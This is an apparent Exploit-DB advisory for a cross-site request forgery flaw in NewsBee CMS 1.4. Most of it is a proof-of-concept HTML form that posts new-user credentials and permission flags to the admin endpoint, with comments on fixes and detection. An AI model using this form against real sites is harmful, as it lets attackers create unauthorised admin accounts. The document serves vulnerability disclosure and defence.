NewsBee CMS 1.4 - Cross-Site Request Forgery

EDB-ID: 44735
Author: indoushka
Published: 2018-05-23
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Author: indoushka 
# Tested on: windows 10 Français V.(Pro)
# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Dork: N/A

# PoC


<!--
  Proof-of-concept markup for the NewsBee CMS 1.4 cross-site request forgery
  report (EDB-ID 44735). It reproduces the admin panel's "Create User" form
  and posts it to admin/admin-pass-new.php on the target host.

  What the listing shows: every field is either typed by the submitter or a
  fixed constant. No anti-CSRF token, nonce or other per-session value is
  included. Per the advisory title, the endpoint is reported to accept the
  request anyway, which would mean the administrator's session cookie is the
  only thing authorising account creation.

  Defender notes:
  - Fix: have admin-pass-new.php require and verify an unpredictable
    per-session token on every state-changing POST, set SameSite on the
    session cookie, and reject requests whose Origin/Referer is not the
    site itself. Asking for the current admin password before creating an
    account adds a second barrier.
  - Detection: review web-server logs for POSTs to
    /NewsBee/admin/admin-pass-new.php whose Origin or Referer header is
    missing or foreign, and audit the CMS user table for accounts nobody
    remembers creating.
-->
<div class="full-height-scroll">
<div class="table-responsive" style="float:left;">
<div>


<!--
  "Target" in the action URL is a placeholder host name.
  The onsubmit handler is carried over from the application's own page; it
  writes to an element with id "loading", and no such element appears in
  this listing.
-->
<form action="http://Target/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">

<!-- Credentials of the account to be created; sent as plain POST fields "un" and "pw". -->
<label>Username</label>
<input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">

<label>Password</label>
<input name="pw" required="" class="form-control" id="pw" value="" type="password">

<!--
  Permission matrix. Each ticked checkbox submits the value "Y" under its
  name; unticked boxes are not sent. In this listing "news", "videos" and
  "gallery" are pre-checked. The new account's privileges travel in the same
  request as its credentials, so a forged submission would set both. When
  auditing, check the permission flags of recently created accounts as well
  as their existence.
-->
<label>Permissions</label>
<table class="table table-striped table-bordered table-hover " width="300">
<tbody><tr>
<td bgcolor="#CCCCCC">&nbsp;</td>
<td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
</tr>
<tr>
<td bgcolor="#CCCCCC">News</td>
<td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Videos</strong></td>
<td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
<td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>Ads</strong></td>
<td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
<td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
<td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Categories</strong></td>
<td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Pages</strong></td>
<td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

</tbody></table>



<input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">

<!--
  MM_insert / MM_update carry the constant form name "form1". They look like
  generator-emitted markers telling the server script which form was posted
  (TODO confirm against admin-pass-new.php). They are static and identical
  for every visitor, so they provide no request-origin assurance and are not
  a substitute for a CSRF token.
-->
<input name="MM_insert" value="form1" type="hidden">
<input name="MM_update" value="form1" type="hidden">
</form>

<br>
<!-- NOTE(review): four closing div tags follow but only three are opened in this excerpt; the extra one presumably matches markup outside the copied fragment. -->
</div>
</div>
</div>
</div>
